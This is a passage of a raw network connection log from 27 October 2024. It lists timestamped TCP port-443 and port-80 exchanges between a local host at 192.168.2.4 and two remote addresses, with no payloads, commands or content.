Oct 27, 2024 17:11:35.860405922 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.860454082 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.860517979 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.861330032 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.861368895 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.885860920 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.886013985 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.886073112 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.886121988 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.886121988 CET	57899	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.886167049 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.886190891 CET	443	57899	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.888569117 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.888619900 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.888691902 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.888823032 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:35.888844967 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:35.960196018 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:35.960551977 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:35.966620922 CET	80	57909	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:35.966710091 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:35.966837883 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:35.967226982 CET	80	57893	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:35.967284918 CET	57893	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:35.972783089 CET	80	57909	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:36.572810888 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.573322058 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.573358059 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.573935986 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.573942900 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.577744961 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.578007936 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.578059912 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.578459978 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.578474045 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.594118118 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.594472885 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.594481945 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.595141888 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.595145941 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.604903936 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.605209112 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.605264902 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.605788946 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.605802059 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.629580021 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.629870892 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.629910946 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.630404949 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.630417109 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.705780983 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.705869913 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.705976009 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.706060886 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.706083059 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.706207037 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.706227064 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.706242085 CET	57904	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.706248045 CET	443	57904	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.709230900 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.709299088 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.709402084 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.709647894 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.709676981 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.711550951 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.711605072 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.713236094 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.713310957 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.713310957 CET	57905	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.713352919 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.713385105 CET	443	57905	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.716097116 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.716130972 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.717101097 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.722560883 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.722575903 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.728791952 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.728859901 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.728965998 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.729111910 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.729187965 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.729197979 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.729208946 CET	57906	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.729212999 CET	443	57906	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.731710911 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.731808901 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.731905937 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.732032061 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.732068062 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.739625931 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.739794970 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.739859104 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.739891052 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.739907980 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.739934921 CET	57907	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.739947081 CET	443	57907	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.742182016 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.742203951 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.742273092 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.742391109 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.742402077 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.763740063 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.763787031 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.763843060 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.763993025 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.764034033 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.764034033 CET	57908	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.764059067 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.764082909 CET	443	57908	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.766320944 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.766350985 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.766433954 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.766587019 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:36.766611099 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:36.862191916 CET	80	57909	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:36.862466097 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:37.565819979 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.567365885 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.567379951 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.567960978 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.567965984 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.574484110 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.574939013 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.574984074 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.575484037 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.575496912 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.575803041 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.575872898 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.576112986 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.576148987 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.576545954 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.576558113 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.576566935 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.576580048 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.577032089 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.577038050 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.578063965 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.579216003 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.579231977 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.579685926 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.579694986 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.694765091 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.694787979 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.694834948 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.694853067 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.694900990 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.695102930 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.695116043 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.695123911 CET	57911	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.695130110 CET	443	57911	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.698106050 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.698142052 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.698227882 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.698364019 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.698375940 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.708595991 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.708667040 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.708729029 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.708838940 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.708868980 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.708895922 CET	57914	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.708911896 CET	443	57914	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710140944 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710165977 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710242987 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.710270882 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710295916 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710347891 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.710732937 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.710762024 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.710787058 CET	57910	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.710800886 CET	443	57910	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.711807966 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.711846113 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.711852074 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.711914062 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.712001085 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.712025881 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.712037086 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.712060928 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.712544918 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.712562084 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.712584019 CET	57912	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.712594032 CET	443	57912	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.714098930 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714143038 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.714215040 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714375973 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714394093 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.714659929 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714670897 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.714735031 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714848042 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.714859009 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.717564106 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.718127012 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.718166113 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.718173981 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.718209028 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.718254089 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.718261003 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.718271017 CET	57913	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.718276024 CET	443	57913	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.720196009 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.720206976 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:37.720276117 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.720376968 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:37.720391989 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.369326115 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:38.369750977 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:38.375123978 CET	80	57909	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:38.375142097 CET	80	57920	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:38.375175953 CET	57909	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:38.375250101 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:38.375391006 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:38.380639076 CET	80	57920	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:38.421654940 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.422329903 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.422344923 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.423461914 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.423466921 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.447012901 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.447231054 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.447473049 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.447503090 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.447532892 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.447550058 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.448024988 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.448029995 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.448318005 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.448323011 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.457518101 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.457860947 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.457880020 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.458470106 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.458475113 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.466587067 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.466948986 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.466955900 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.467318058 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.467322111 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.553580046 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.554250956 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.554285049 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.554306030 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.554896116 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.554896116 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.554896116 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.556961060 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.556993961 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.557080030 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.557241917 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.557256937 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.576545954 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.576617002 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.576673031 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.576771975 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.576781988 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.576808929 CET	57916	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.576814890 CET	443	57916	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.578202963 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.578349113 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.578403950 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.578433037 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.578437090 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.578452110 CET	57918	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.578455925 CET	443	57918	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.579188108 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.579233885 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.579308033 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.579480886 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.579498053 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.580488920 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.580498934 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.580554962 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.580688953 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.580699921 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.594711065 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.594742060 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.594789982 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.594804049 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.594837904 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.594974041 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.594986916 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.595000029 CET	57917	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.595005989 CET	443	57917	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.597173929 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.597208023 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.597291946 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.597449064 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.597464085 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.600208044 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.600229025 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.600261927 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.600282907 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.600307941 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.600406885 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.600411892 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.600425959 CET	57919	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.600430012 CET	443	57919	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.602463961 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.602533102 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.602624893 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.602792025 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.602823019 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:38.865979910 CET	57915	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:38.865992069 CET	443	57915	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.302932978 CET	80	57920	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:39.303021908 CET	57920	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:39.434010029 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.434607029 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.434639931 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.435178995 CET	57925	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.435193062 CET	443	57925	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.435653925 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.436024904 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.436053991 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.436486959 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.436495066 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.439202070 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.439547062 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.439577103 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.440097094 CET	57922	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.440104008 CET	443	57922	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.448208094 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.448448896 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.448681116 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.448690891 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.448770046 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.448785067 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.449357986 CET	57923	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.449362993 CET	443	57923	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.449420929 CET	57924	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.449424982 CET	443	57924	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.568923950 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.568967104 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.569035053 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.569294930 CET	57921	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:39.569314003 CET	443	57921	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:39.569327116 CET	57921	443	192.168.2.4	13.107.246.51
